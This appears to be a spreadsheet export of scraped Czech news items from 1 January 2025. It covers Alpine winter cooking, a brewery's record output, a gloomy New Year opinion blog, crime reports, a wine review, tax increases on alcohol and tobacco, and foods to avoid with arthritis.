kuchyně a stalo se symbolem společného stolování. Tradičně se připravuje z tavených sýrů, jako je Gruyere nebo Emmental, s přídavkem bílého vína a trochou česneku a nabízí jednoduchost a intenzivní chuť. Namáčení plátků chleba do horkého ochuceného sýra je rituál, který spojuje a přináší jedinečnou atmosféru. Fondue se neomezuje pouze na sýrovou verzi. Existují různé varianty, například masové fondue, kdy se kousky masa vaří v horkém vývaru, nebo čokoládové fondue, které je ideální jako dezert. Každá z těchto verzí má svůj jedinečný charakter, ale jedno mají společné: tento pokrm je jako stvořený pro sdílení s blízkými, zejména za chladných zimních večerů. Raclette je sýrová hostina na stole Raclette je kvintesencí alpské kuchyně, která oslavuje teplo, jednoduchost a společné sdílení jídla. Název pochází od stejnojmenného polotvrdého sýra, který se po zahřátí stává krémovým a aromatickým. Tradičně se sýr raclette ohříval na otevřeném ohni a roztavená vrstva se seškrabovala na talíře. V dnešní době se často používají speciální stolní rošty, díky nimž je raclette skvělou volbou pro skupinová setkání. Základem raclette jsou brambory, které se dokonale kombinují s roztaveným sýrem. Kromě toho se podávají různé přílohy, jako jsou nakládané okurky, nakládané okurky, perličková cibulka, různé druhy masa a čerstvá zelenina. Soupravu můžete doplnit také houbami, paprikou nebo ji podávat s křupavým chlebem. Raclette je nejen pokrm, ale také způsob, jak se dobře pobavit: každý u stolu si tvaruje vlastní porce, což podporuje konverzaci a dobrou zábavu. Ideální volba pro zimní večery, kdy společné jídlo zahřeje nejen tělo, ale i atmosféru. Alpské polévky a dušené maso Alpská kuchyně není jen o sýrových pochoutkách, ale také o hřejivých polévkách a dušených pokrmech, které jsou ideální pro zimní klima. Tyto pokrmy bohaté na aromatické ingredience dodávají horalům energii a teplo v chladných dnech již mnoho let. Jedním z klasických pokrmů je cibulová polévka, která se v alpské verzi často obohacuje trochou bílého vína nebo vývarem na bázi místních sýrů. Podává se s krutony zapečenými se sýrem a představuje vydatný a chutný pokrm. Dalším příkladem je dušené jehněčí nebo hovězí maso s kořenovou zeleninou, jako je mrkev, celer nebo brambory. Dušené s aromatickým kořením a bylinkami, jako je tymián nebo rozmarýn, se stane svátkem chuti. Nesmíme zapomenout ani na kaštanovou polévku, která potěší svou krémovou konzistencí a jemnou oříškovou chutí. Často se podává s křupavými krutony nebo porcí smetany, což podtrhuje její rafinovaný charakter. Alpské polévky a dušená jídla jsou pokrmy s jedinečnou chutí a způsobem, jak si vychutnat jednoduchost a autenticitu místních produktů, které dominují místní kuchyni po celé generace. Jsou ideální pro zimní večery a přinášejí na stůl jedinečnou atmosféru horského regionu. Předkrmy a dezerty s alpským charakterem K alpské kuchyni patří také jedinečné předkrmy a dezerty, které se skvěle hodí do zimního menu. Křupavé savojské krtky – zapečené krutony se sýrem a šunkou nebo alpské rösti s taveným sýrem – jsou ideálním předkrmem pro chladné dny. Mezi dezerty patří krémový jablečný koláč, kaštanový dort s jemnou oříškovou chutí, klasické linecké sušenky a voňavý jablečný závin. Tyto jednoduché, ale vynikající pochoutky přinášejí na zimní stůl teplo a chuť horského klimatu. Vína a nápoje k alpským pokrmům Alpská kuchyně bohatá na sýrové a masové pochoutky se dobře snoubí s místními víny a nápoji, které umocňují její chuť. K sýrovému fondue si vyberte suchá bílá vína , jako je Fendan nebo Apremont, a k raclette se vyplatí zvolit ryzlink rýnský nebo Chasla. K alpským polévkám a dušeným pokrmům se hodí červené Pinot Noir nebo Gamay. Tyto pokrmy skvěle doplní i nealkoholické alternativy, jako je horký bylinkový čaj nebo jablečný mošt. Aperitivy, jako je Genepi, a digestivy, jako je Grappa, doplňují jídlo a dodávají mu alpskou atmosféru. Jak zavedete alpskou kuchyni do své domácnosti? Alpská kuchyně se sýrovými specialitami a vydatnými pokrmy je ideální pro zimní večery. Začněte sýry, jako je Gruyere nebo Emmental, z nichž připravíte fondue, raclette nebo zapékané pokrmy. Z brambor, kořenové zeleniny a aromatického koření připravte dušené maso a polévky a jako dezert vyzkoušejte Kaiserschmarrn nebo Apfelstrudel. Přidejte místní chléb a nakládanou zeleninu a vytvořte alpskou atmosféru pomocí dřevěného nádobí a svíček. Je to snadný způsob, jak zažít kulinářské dobrodružství a hřejivou domácí atmosféru. Alpská kuchyně je ideální způsob, jak v zimních dnech připravit hřejivé a vydatné pokrmy. Fondue, raclette, dušené maso, polévky a tradiční dezerty přinesou do vašeho domova jedinečnou chuť hor a atmosféru útulných přístřešků. Díky jednoduchým surovinám, aromatickému koření a rodinné hostině u stolu si můžete vychutnat alpské klima v pohodlí domova. Autor: Dominika Rubrika transition_slide Food</t>
  </si>
  <si>
    <t>20250101_83_3696902138_7a647c74da2c8636ea94.html</t>
  </si>
  <si>
    <t>7a647c74da2c8636ea94</t>
  </si>
  <si>
    <t>Pivovar Bernard loni vystavil nejvíce piva za dobu své existence</t>
  </si>
  <si>
    <t>Pivovar Bernard loni vystavil nejvíce piva za dobu své existence Rodinný pivovar Bernard v roce 2024 vystavil 419 tisíc hektolitrů piva , nejvíce za 33 let existence. Je to o 10 tisíc hl více než v předchozím roce. Produkce pivovaru jde proti vývoji na trhu, kde prodej piva dlouhodobě postupně klesá. Dvě třetiny piva Bernard vyčepují restaurace a hospody ze sudů, třetina se prodá v lahvích, přitom na českém trhu je poměr opačný. „ Každý rok se vypořádáváme s dalšími překážkami, od covidu přes skokové nárůsty cen energií a surovin, válku na Ukrajině , zvýšení daní, nekončící bujení administrativy až po povodně, jejichž dopad jsme také pocítili. Přesto se nám daří růst. Nemáme to zadarmo, je za tím píle a poctivá práce. Proto nás opravdu těší, že si naše pivo vybírá stále více lidí, “ hodnotí vývoj generální ředitel a vrchní sládek Josef Vávra. „Od počátku usilujeme o co nejvyšší kvalitu piva a služeb a naše snaha přináší výsledky. Věřím v poctivou práci a dobré vztahy s obchodními partery a zákazníky. Má smysl jít vlastní cestou v marketingu a mít schopné obchodníky, kterým se daří nacházet nová odbytiště, i když řada provozoven v posledních letech padla, “ ohlíží se za uplynulým rokem také spolumajitel pivovaru Stanislav Bernard , podle kterého se aktuálními výsledky pivovar přiblížil na hranu svých kapacit. Pivovar Bernard Josef Vávra a Stanislav Bernard Růst pozastavil pouze covid Výstav Rodinného pivovaru Bernard se kontinuálně zvyšuje od roku 2001 (95 tisíc hl.). Hranici 400 tisíc hektolitrů se mu podařilo přesáhnout poprvé v roce 2019, v následujících letech ovšem přišel pokles prodeje v důsledku opatření proti šíření covidu (zavírání hospod apod.). V roce 2022 byl výstav pivovaru bezmála 398 tisíc hektolitrů, v roce 2023 už 409 tisíc hektolitrů piva . Rodinný pivovar Bernard sídlící v Humpolci na Vysočině exportuje 21 procent své produkce do 25 zemí světa, nejvíce na Slovensko , do Švédska a do Bulharska . Zaměstnává 267 lidí, dalších 28 osob má práci v humnové Sladovně Bernard v Rajhradě u Brna . V roce 2022 pivovar otevřel ve svém areálu Návštěvnické centrum Bernard . V roce 2024 se v soutěži Společnosti přátel piva stal už poosmé pivovarem roku. Tags: Bernard pivo pivovar rekord výstav You may also like... Autor: redakce</t>
  </si>
  <si>
    <t>20250101_84_3696886438_5907834901888942e6d1.html</t>
  </si>
  <si>
    <t>5907834901888942e6d1</t>
  </si>
  <si>
    <t>Nový rok už od dětství docela slušně nedávám</t>
  </si>
  <si>
    <t>Nový rok už od dětství docela slušně nedávám Deprese, zmar a tíseň. Takové jsou moje každoroční pocity z prvního ledna. Mám to tak od té doby, co se pamatuji. Jakoby bych na světě zůstal sám po Apokalypse. Vždycky se mi vybaví ta mrtvolná atmosféra novoročního dopoledne. Bloudím sám liduprázdnými ulicemi, na zemi spousta rozbitých či nedopitých lahví alkoholu a všelijaké další haraburdí a smetí. Všichni vyspávají kocovinu, Vánoce v trapu a zítra zase do školy. Není většího zmaru. Tenhle zážitek se do mě vryl tak hluboko, že prostě Nový rok od té doby nesnáším. Odpoledne frázovitý novoroční projev prezidenta plný falešných slibů a planých nadějí. Nic nefunguje, všude zavřeno a všichni zalezlí ve svých ulitách. Není komu zavolat, s kým si popovídat, natož cokoliv podniknout. Svět umřel a kolem mě jako by kroužila smrt. Jímá mě úzkost, ale nezbývá než to přetrpět. Dojídají se okoralé chlebíčky, pijí se hektolitry kávy a konzumují se lektvary na povzbuzení či na zmírnění kocoviny. Naprosto zbytečný, promarněný a plonkový den. Ještě, že už zítra se zase všecko vrátí do normálu. Inu, do normálu… Co je vlastně dneska normál? Všechno a nic zároveň. Navíc nás čeká pekelně těžký rok, v jehož závěru se sice - jak doufám - zbavíme hlavního škůdce, který se konečně odporoučí zpátky do Brna , ale tím se jako mávnutím kouzelného proutku příliš nezmění. Přesto věřím, že s příchodem Donalda Trumpa by se něco zlepšit mohlo. Možná dokonce hodně. Pokud se konečně podaří ukončit válku na Ukrajině a aspoň trochu vyčistit progresivní chlívek , bude to paráda. Donald to slibuje, tak uvidíme. Se starým Joem (v Česku hojně přezdívaným „Bidet“) bychom na něco takového mohli rovnou zapomenout, jako on zapomínal, kde je, a co dělá. Hlavně, že neopomněl udělit milost svému povedenému synáčkovi Hunterovi , ačkoliv sliboval, že to nikdy neudělá. Na to taky asi zapomněl. Ten chudák, který byl dokonalou vizitkou dekadentního Západu, už vůbec nevěděl, která bije. Až teď konečně americká administrativa a média přiznávají, co jsme 4 roky měli možnost sledovat v přímém přenosu. Přesto starý Joe téměř do poslední chvíle tvrdil, že se těší skvělé mentální kondici, i když například prohlásil, že „byl první černoškou, která sloužila s černým prezidentem“. Nějaký důvod k opatrnému optimismu by tu díky Donaldovi byl, pokud ho ovšem do inaugurace nikdo nezavraždí. Že Evropská socialistická republika půjde ještě víc do kytek, to je zase druhá věc. Jsou o tom přesvědčeni někteří erudovaní ekonomové v popředí s Markétou Šichtařovou . Aby taky ne, když EU s pomatenou Ursulou tvrdošíjně trvá na svých zelených experimentech a na dotačním a přerozdělovacím splachování peněz do kanálu. Nechci ale hned první den v roce tolik sýčkovat a rád bych přidal ještě něco povzbudivého. Bohužel mě zrovna nic nenapadá. Což takhle dát si alespoň pár novoročních vtipů na spravení nálady? Přijde holohlavý chlápek do kadeřnictví a ze svých posledních třech vlasů chce uplést copánek. Holič se netváří zrovna nadšeně, ale pustí se do díla. Co čert nechtěl, jak plete, jeden vlas vytrhne. Zákazník je z toho dost rozlazený, ale po chvíli řekne: „No tak pleťte dál.“ Holič tedy plete dál, jenže netrvá dlouho a podaří se mu vyškubnout i druhý vlas. Hrozně se zákazníkovi omlouvá a sype si popel na hlavu. Zákazník se na něj smutně podívá a pronese: „Ale co, tak to nechte rozpuštěný.“ Víte, jak poznáte, že jste starý? Když vám všichni chválí vaše boty z krokodýlí kůže, a vy jste přitom naboso. Přijde žena do erotic shopu, chvíli se rozhlíží a pak řekne, že by si vzala tam ten červený vibrátor. A prodavačka na to: „Ale to je hasicí přístroj, paní!“ Hezký či alespoň snesitelný nový rok 2025 všem lidem dobré vůle</t>
  </si>
  <si>
    <t>20250101_85_3696867639_92de8558dfb0e3d57530.html</t>
  </si>
  <si>
    <t>92de8558dfb0e3d57530</t>
  </si>
  <si>
    <t>Sportovní vědec Milan Sedliak v&amp;nbsp;rozhovoru vysvětluje, proč je alkohol „startér...</t>
  </si>
  <si>
    <t>Sportovní vědec Milan Sedliak v&amp;nbsp;rozhovoru vysvětluje, proč je alkohol „startér... Sportovní vědec Milan Sedliak v rozhovoru vysvětluje, proč je alkohol „startér nevázaného chování“. „Abychom spálili dvě deci suchého vína , musíme absolvovat desetiminutový lehký běh, velké pivo se rovná patnáctiminutovému běhu nebo půlhodině pomalé jízdy na kole,“ vysvětluje. Autor: Marie Dámková Autor Marie Dámková Rubrika transition_slide Česko</t>
  </si>
  <si>
    <t>20250101_86_3696943242_105e8e72d396aae6553e.html</t>
  </si>
  <si>
    <t>105e8e72d396aae6553e</t>
  </si>
  <si>
    <t>Anička Slováčková si plní sny! A zjišťuje, kdo při ní opravdu stojí!</t>
  </si>
  <si>
    <t>Anička Slováčková si plní sny! A zjišťuje, kdo při ní opravdu stojí! Sdílet na WhatsAppu Anička Slováčková si navzdory zákeřné nemoci snaží plnit sny a jeden si splnila o letošních Vánocích, když vyrazila do vánočně naladěného New Yorku . A nebyla tam sama. Fanoušci tak mohli poznat lidi, na které se herečka a zpěvačka může opravdu spolehnout. "Jedeš s partou kamarádů na výlet do jiný země. Na jinej kontinent. Každý z těch sedmi lidí má silnou osobnost. Každý z nich chce vidět něco jinýho. Každej má jiný názory. Ale jedno máte společný - máte se navzájem šíleně moc rádi," napsala Slováčková na sociální síti. "Díky za další boží zážitky, parto," dodala ještě ke snímku, kterým se pochlubila na svém ostře sledovaném instagramovém profilu. Zobrazit příspěvek na Instagramu Známá herečka a zpěvačka dříve přiznala, že návštěvou americké metropole ve vánočním období si plní sen. "Poprvé jsem tam byla před jedenácti lety. Vždycky jsem toužila vidět vánoční New York , takové ty kýčovité americké Vánoce. Od malinka o tom sním, tak se moc těším, že si to tam užijeme," řekla podle webu iDnes.cz s tím, že jede parta kamarádů. Šlo o muzikanty, kteří si ve slavném městě chtěli zároveň i zahrát, respektive zazpívat. "Bylo by fajn, kdyby se nám podařilo navštívit jazzový klub, ve kterém by se jamovalo, a byl by natolik otevřený, že bychom si tam případně mohli zahrát i my," svěřila se dcera Felixe Slováčka a Dády Patrasové . Sympatická herečka a zpěvačka o plánované cestě do New Yorku informovala fanoušky již v dubnu, kdy se na ně obrátila s prosbou. Konkrétně chtěla znát jakékoliv užitečné rady. "V prosinci jedeme s přáteli a hledám rady ohledně vstupenek, jízdenek apod., ať neutrácíme zbytečně za hloupý turisticky chyby. Popř. ubytování… jsme slušní a nenároční… když nebude nikde alkohol zadarmo, vyhneme se taxíkům a batohům," vzkázala příznivcům. Autor: Lenka Kučerová Autor person Lenka Kučerová</t>
  </si>
  <si>
    <t>757</t>
  </si>
  <si>
    <t>775</t>
  </si>
  <si>
    <t>20250101_87_3696863824_273d82ee1ae8b7914597.html</t>
  </si>
  <si>
    <t>273d82ee1ae8b7914597</t>
  </si>
  <si>
    <t>Hrůza na Nový rok. Matku a čtyři dcery našli mrtvé v hotelovém pokoji</t>
  </si>
  <si>
    <t>Hrůza na Nový rok. Matku a čtyři dcery našli mrtvé v hotelovém pokoji Ilustrační foto | Zdroj: Profimedia Kateřina Herodesová 1. 1. 2025, 16:39 Děsivý pohled se naskytl policistům v Indii poté, co otevřeli dveře pokoje v jednom z tamních hotelů ve městě Lucknow na severu země. Uvnitř nalezli pět mrtvých. Údajně mělo jít o matku a její čtyři dcery. Bezvládná těla matky a jejích čtyř dcer ve věku 9, 16, 18 a 19 let našla indická policie v hotelovém pokoji ve městě Lucknow ve středu v brzkých ranních hodinách. Podle Times of India stojí za jejich smrtí páté z dětí – 24letý syn. Ten se údajně sám přihlásil na policii. U výslechu měl říct, že se obával o jejich budoucnost. "Přiznal se k zabití svých čtyř sester a matky a řekl, že lidé v sousedství obtěžovali jeho rodinu. Bál se, že kdyby se mu něco stalo, udělali by něco jeho matce a sestrám, a tak se je rozhodl zabít," sdělila médiím tamní policie. Na vraždách se měl údajně podílet i otec od rodiny, píše India Today . Rodině měli před činem dát alkohol a jiné omamné látky. Sami údajně byli pod vlivem alkoholu . Syn měl otce následně vysadit na vlakovém nádraží a sám se vydal udat. Zatímco syn zůstává ve vazbě, po otci policie stále pátrá. TN.cz Autor: Kateřina Herodesová Autor person Kateřina Herodesová</t>
  </si>
  <si>
    <t>20250101_88_3696778275_76cb49ee9ae05ccfd09f.html</t>
  </si>
  <si>
    <t>76cb49ee9ae05ccfd09f</t>
  </si>
  <si>
    <t>Víno Frankovka 2021, pozdní sběr, Rajhradské klášterní vinné sklepy</t>
  </si>
  <si>
    <t>Víno Frankovka 2021, pozdní sběr, Rajhradské klášterní vinné sklepy Zobrazit rozložení bodů 'stobodovky' 19. 12. 2023 „Světle žlutá barva s četnými stříbřitými odlesky, střední viskozita. Středně intenzivní vůně, která evokuje bílé peckoviny, žlutá jablka, žlutý meloun a dozrávající meruňky. Chuť je lehčí, svěží s dobrou základní strukturou, solidní ovocná kyselina, tóny jablek a jadřinců, salinita a mineralita v dochuti. Selské, jednoduší víno ideálně na každodenní popíjení.“ /100 24. 11. 2024 „Čirá, zářivě žlutá barva s leskle mosaznými odlesky a výraznější viskozitou. Bohatá, čistá, intenzivnější, mnohovrstevný vůně snoubí jemné tóny sušených bylin, s decentním nádechem bílého rybízu, citrusů, jemně koření, stopově i minerály. Plnější, šťavnatá suchá chuť, s výraznější, ale příjemně osvěžující kyselinkou, připomínající citrusy a bílý rybíz. Velmi dlouhý závěr s příchutí grepu.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_89_3696766389_92cac5a30d90858b1b93.html</t>
  </si>
  <si>
    <t>92cac5a30d90858b1b93</t>
  </si>
  <si>
    <t>Analýza DNA odhalila po 43&amp;nbsp;letech vraha osmnáctileté dívky</t>
  </si>
  <si>
    <t>Analýza DNA odhalila po 43&amp;nbsp;letech vraha osmnáctileté dívky 18letou dívku zavraždil v roce 1981 v jejím bytě tehdy 26letý soused. Ilustrační snímek. Desítky let starý případ se vyřešil pomocí identifikace DNA z důkazů z místa vraždy. Vrah je však po smrti, vloni v listopadu ho americká policie během pokusu o zadržení při přestřelce zabila. Článek si také můžete poslechnout v audioverzi. Policie identifikovala pomocí analýzy DNA po 43 letech vraha 18leté dívky z amerického Ohia . Je jím 68letý James Vanest, kterého policie zastřelila v listopadu minulého roku při přestřelce v motelu v Ohiu . Tehdy ho stíhala kvůli federálnímu obvinění souvisejícímu s nelegálním držením střelných zbraní. Informuje o tom agentura AP. Servírka Debra Lee Millerová byla zavražděna ve svém bytě 29. dubna 1981. Pitva ukázala, že zemřela na následky tupého poranění hlavy a krku. Tehdejší prokurátor okresu Richland County uvedl, že byla ubita k smrti mřížkou hořáku plynového sporáku, píše server Richland Source. Vyšetřovatelé tehdy pachatele nenašli. Policie znovu otevřela odložený případ až v roce 2021 v naději, že by mohl pokrok ve forenzních vyšetřovacích technikách pomoci. Nová analýza odhalila profil DNA na důkazech z místa vraždy a přiřadila ho k Vanestovi. V době činu mu bylo šestadvacet let a žil v bytě nad obětí. Policie ho sice během počátečního vyšetřování vyslýchala, ale nikdy ho neidentifikovala jako podezřelého. DNA se odebírala z krve a předmětů, které podle policie sloužily jako vražedné zbraně – jednalo se o hrnce, pánve a rošty do trouby, uvedla policejní DNA analytička. Původní vyšetřování se zaměřilo pouze na krevní skupiny. Policisté se na pondělní konferenci nezmínili o tom, proč měli Vanestovu DNA v databázi. Noviny The Repository však popisují Vanesta jako osobu s rozsáhlou kriminální minulostí datovanou až do 70. let. Byl odsouzen k 15 letům vězení za ozbrojenou bankovní loupež, použití střelné zbraně ke spáchání trestného činu a držení střelné zbraně jako již usvědčený zločinec. Další výslechy Po identifikaci DNA prověřila Vanesta v roce 2021 policie znovu. Během výslechu přiznal, že v roce 1981 vyšetřovatelům lhal. Nově sdělil, že ho dívka před svou smrtí pozvala do bytu a měl s ní pohlavní styk, uvedl server Richland Source. Podle policie se tím však snažil vytvořit alibi, aby vysvětlil přítomnost svého DNA v bytě zavražděné dívky. Detektiv, který Vanesta vyslýchal, však tvrdí, že se před ním o nalezené shodě DNA nezmínil. Naposledy se snažila policie Vanesta vyslechnout na jaře minulého roku. Mluvit však odmítl a požádal o advokáta, uvedl mansfieldský policejní náčelník Jason Bammann. Podle úřadů Vanest následně prodal svůj dům v Ohiu a uprchl do Západní Virginie . V domě po sobě zanechal několik střelných zbraní a s dalšími dvěma byl zastaven v Západní Virginii . Policie ho zatkla, ale následně ho na kauci propustila. Federální úřad pro alkohol , tabák, střelné zbraně a výbušniny (ATF) později Vanesta obvinil z nelegálního držení střelných zbraní. V listopadu se ho proto snažila policie zadržet v motelu v Severním Cantonu v Ohiu . Zabarikádoval se však uvnitř pokoje a zahájil přestřelku, během které ho jeden z policistů zastřelil. Prokurátorka okresu Richland County v Ohiu uvedla, že na případu úzce spolupracovala s policií. Její úřad proti Vanestovi připravoval obžalobu za vraždu a chystal se ji předložit velké porotě. Úřad však přezkoumával dostupné důkazy a potřebné svědky. Případ se ale kvůli zastřelení Vanesta k velké porotě nikdy nedostal. Podezírání policie z vraždy Usmrcení 18leté Debry Lee Millerové bylo jedním z mnoha případů z oblasti Mansfieldu , které se v 80. letech prověřovaly kvůli možnému napojení na policisty. Zvláštní vyšetřování nařízené starostou nakonec dospělo v roce 1989 k závěru, že neexistují žádné důkazy, které by spojovaly policisty s vraždami, podotkl server The Independent. Vyšetřování však vneslo otázky ohledně způsobu, jakým policie vyšetřovala některé mordy. Zároveň odhalilo, že Millerová měla podle poznámek ve svém deníku milostný vztah s několika mansfieldskými policisty. Tamní policejní šéf odešel z funkce v lednu 1990 poté, co se objevily stížnosti na údajné nesrovnalosti při vyšetřování smrti bývalé manželky jednoho z mansfieldských strážníků.</t>
  </si>
  <si>
    <t>20250101_9_3698302344_257af6a03ddfc199a095.html</t>
  </si>
  <si>
    <t>257af6a03ddfc199a095</t>
  </si>
  <si>
    <t>Ministerstvo financí navyšuje daň: Od 1. ledna 2025 si pořádně připlatíte</t>
  </si>
  <si>
    <t>Ministerstvo financí navyšuje daň: Od 1. ledna 2025 si pořádně připlatíte alkohol , cigarety, daně, tabák, zdražování Od 1. ledna 2025 se kuřáci a konzumenti alkoholických nápojů budou muset smířit s vyššími cenami svých oblíbených produktů. Zvýšení spotřební daně, které je součástí vládního konsolidačního balíčku, se dotkne tabákových výrobků i alkoholických nápojů. Opatření má přispět k úsporným opatřením ve veřejných financích a podpořit boj proti závislostem. Jednou z nejviditelnějších změn je zdražení cigaret. Spotřebitelé si za krabičku cigaret od ledna 2025 připlatí průměrně 5 Kč, což je důsledkem 5% nárůstu spotřební daně. U zahřívaného tabáku je dopad ještě výraznější, kdy daň vzrostla o 15 %. To se projeví zdražením krabičky o několik korun. Toto zvyšování je součástí tříletého plánu, který každoročně navyšuje sazby daně u tabákových výrobků i alkoholu . Podle ministerstva financí jde o opatření, které nejen že sleduje zdravotní cíle, ale také reaguje na doporučení odborníků z Národní ekonomické rady vlády (NERV) a reflektuje situaci v okolních zemích, kde se sazby na zahřívaný tabák postupně přibližují běžným cigaretám. Nejvýrazněji stoupne cena zahřívaného tabáku Podle dostupných informací se průměrná cena krabičky cigaret pohybovala v roce 2020 kolem 100 Kč. V roce 2023 se ceny zvýšily na rozmezí 120 až 140 Kč za krabičku, což představuje nárůst o 20 až 40 % během tří let. Zvýšení cen alkoholu Alkoholické nápoje nebyly výjimkou a také u nich došlo ke znatelnému zdražení. Spotřební daň u lihovin se v roce 2025 zvýšila o 10 %. To znamená nárůst ceny například u půllitrové lahve 40% lihoviny o zhruba 7 korun. V roce 2026 se plánuje další navýšení o 5 %. Naopak pěstitelské pálení pro vlastní spotřebu zůstává zdaněno poloviční sazbou. Zvyšování spotřební daně na lihoviny se setkalo s kritikou ze strany výrobců, kteří upozorňují na pokles výběru daně a propad prodejů. Například Unie výrobců a dovozců lihovin ČR varovala, že další navyšování sazeb by mohlo být pro průmysl likvidační. Tento sektor již v první polovině roku 2024 zaznamenal pokles prodejů o více než 50 % ve srovnání se stejným obdobím předchozího roku. Co je to spotřební daň? Spotřební daň je nepřímá daň, která se vztahuje na určité druhy zboží, jako jsou tabákové výrobky, alkohol nebo pohonné hmoty. Jejím cílem je nejen získat finanční prostředky pro státní rozpočet, ale také regulovat spotřebu produktů, které mohou být škodlivé pro zdraví nebo životní prostředí. Spotřební daň je zpravidla zahrnuta do ceny zboží, a tak ji přímo platí spotřebitel. Výše této daně se může lišit v závislosti na druhu produktu a politice státu. Cigarety i alkohol zdraží kvůli zvýšení spotřební daně Diskuse o daňové spravedlnosti Výrobci lihovin také kritizují nerovnoměrné daňové zatížení různých typů alkoholických nápojů. Zajímavé je, že zdanění alkoholu není všude stejně vysoké. Pivo a šumivá vína si zachovávají stávající sazbu spotřební daně, zatímco na tichá vína daň nadále neplatí. Zatímco lihoviny tak tvoří necelých 30 % celkové spotřeby alkoholu , na výběru spotřební daně se podílejí z 65 %. Naopak víno , které tvoří čtvrtinu spotřeby, přispívá na výběr daně jen 4 %. Ekonomické dopady a černý trh Navýšení spotřební daně má kromě zdražení dopad i na chování spotřebitelů. Podle ekonomů dochází ke snižování oficiální spotřeby a růstů černého trhu, což může oslabit efektivitu těchto opatření. Opozice také upozorňuje na to, že zvýšení daně nepřináší očekávané výběry do státního rozpočtu. Pro příklad, za prvních 11 měsíců roku 2024 se na spotřební dani z lihu vybralo o 100 milionů korun méně než v předchozím roce. Zda se opatření v podobě zvyšování spotřební daně osvědčí, ukáže až čas. Na jednu stranu může dojít k poklesu spotřeby a zlepšení zdraví populace, na druhou stranu existuje riziko, že lidé začnou vyhledávat levnější alternativy na černém trhu nebo v zahraničí. Pro výrobce i spotřebitele bude rok 2025 zřejmě obdobím změn, které si vyžádají přizpůsobení novým podmínkám. Autor: jas Autor person jas</t>
  </si>
  <si>
    <t>20250101_90_3696756803_d2a19d327d9a1f6aa42e.html</t>
  </si>
  <si>
    <t>d2a19d327d9a1f6aa42e</t>
  </si>
  <si>
    <t>Nevhodná jídla při artritidě</t>
  </si>
  <si>
    <t>Nevhodná jídla při artritidě 23 Artritida je chronické zánětlivé onemocnění postihující především klouby, které může způsobit bolest, ztuhlost a omezit pohyblivost. Existuje několik typů artritidy, z nichž nejčastější jsou revmatoidní artritida a osteoartróza. Zdravotní stav pacienta může být významně ovlivněn různými faktory, včetně stravy. Výživa může hrát klíčovou roli ve zvládání příznaků artritidy, a i když žádná konkrétní dieta nemůže nemoc vyléčit, může pomoci zmírnit příznaky. Naopak konzumace nevhodných potravin může stát za zhoršením stavu. Vznik artritidy Artritida může vzniknout z různých důvodů. Příčina není vždy jasná a může zahrnovat genetické, imunologické, metabolické a dokonce i infekční faktory. Zánět je hlavním příznakem všech forem artritidy. U revmatoidní artritidy je zánět způsoben autoimunitní reakcí, kdy imunitní systém těla omylem napadá vlastní kloubní tkáně. U osteoartrózy hraje roli opotřebení chrupavky, což může také vést k zánětu. Nevhodná jídla při artritidě Při řízení symptomů artritidy je důležité vyhýbat se určitým druhům potravin, které mohou zánět zhoršit. Mezi klíčové složky, kterým je dobré se vyvarovat, patří následující: Cukr a sladkosti Rafinované cukry mohou spustit produkci zánětlivých procesů v těle. Vyhýbat byste se měli nejen bílému cukru, ale také fruktóze, glukózo-fruktózovému sirupu a dalším sladidlům obsaženým v cukrovinkách, slazených nápojích a zákuscích. Nadměrná konzumace cukru může nejen zvýšit zánět, ale také přispět k nadváze, která dále zatěžuje klouby. Nasycené a trans-tuky Nasycené tuky, které se nacházejí hlavně v živočišných produktech jako je červené maso a tučné mléčné výrobky, mohou zvýšit hladiny zánětlivých markerů v těle. Trans-tuky, přítomné v mnoha průmyslově vyráběných potravinách jako jsou smažené pokrmy, margaríny a některé pekařské výrobky, jsou obzvláště škodlivé a měly by být v rámci jídelníčku eliminovány. Zpracované potraviny a rychlé občerstvení Zpracované potraviny obsahují vysoké množství přidaných cukrů, solí a umělých přísad, které mohou zhoršovat zánět. Rychlé občerstvení, kromě vysokého obsahu tuků a cukrů, obvykle také obsahuje přemíru sodíku, který může přispívat k zadržování tekutin v těle a následnému zhoršení otoků. Bílá mouka a rafinované obiloviny Potraviny z bílé mouky jako bílé pečivo, těstoviny nebo bílá rýže mají vysoký glykemický index, což znamená, že rychle zvyšují hladinu cukru v krvi. To může vést ke zvýšení zánětlivých procesů v těle. Preferovat bychom měli celozrnné varianty, které poskytují více vlákniny a méně ovlivňují hladinu cukru v krvi. Alkohol Alkohol ve větším množství může zvýšit zánět v těle a zhoršit příznaky artritidy. Nadměrná konzumace alkoholu může také negativně ovlivnit metabolismus některých léků používaných k léčbě artritidy. Solanáce (lilkovité rostliny) Některé osoby s artritidou tvrdí, že jim zhoršuje příznaky konzumace lilkovitých rostlin, mezi které patří rajčata, papriky, brambory a lilky. Tyto potraviny obsahují alkaloidy, které mohou u některých jedinců přispět k bolestem kloubů a zánětu. Je důležité podotknout, že každý člověk může reagovat na různé potraviny různě. Proto je klíčové sledovat, které potraviny individuálně zhoršují příznaky a případně je vyloučit či omezit. Konzultace s odborným dietologem nebo lékařem může pomoci přizpůsobit stravu individuálním potřebám a zefektivnit tak zvládání příznaků artritidy. Artritida je komplexní onemocnění, jehož příznaky mohou být zhoršovány nevhodnou stravou. Velký vliv na zánět a bolest mají zejména cukry, nasycené a trans-tuky, zpracované potraviny, bílé mouky, alkohol a případně solanáce. Dodržováním vyvážené a dobře strukturované stravy, přizpůsobené individuálním potřebám, lze významně přispět ke zmírnění příznaků a zlepšení kvality života osob s artritidou. Zdroje: www.pubmed.ncbi.nlm.nih.gov/24284436/, www.pubmed.ncbi.nlm.nih.gov/29610056/, www.pubmed.ncbi.nlm.nih.gov/28652101/ Autor: Lea Novotná Autor person Lea Novotná</t>
  </si>
  <si>
    <t>16560</t>
  </si>
  <si>
    <t>20250101_91_3696755756_de7d7026b8a8cbe248c9.html</t>
  </si>
  <si>
    <t>de7d7026b8a8cbe248c9</t>
  </si>
  <si>
    <t>Otec s pětiletou dcerou na kluzišti jako „Dán“!</t>
  </si>
  <si>
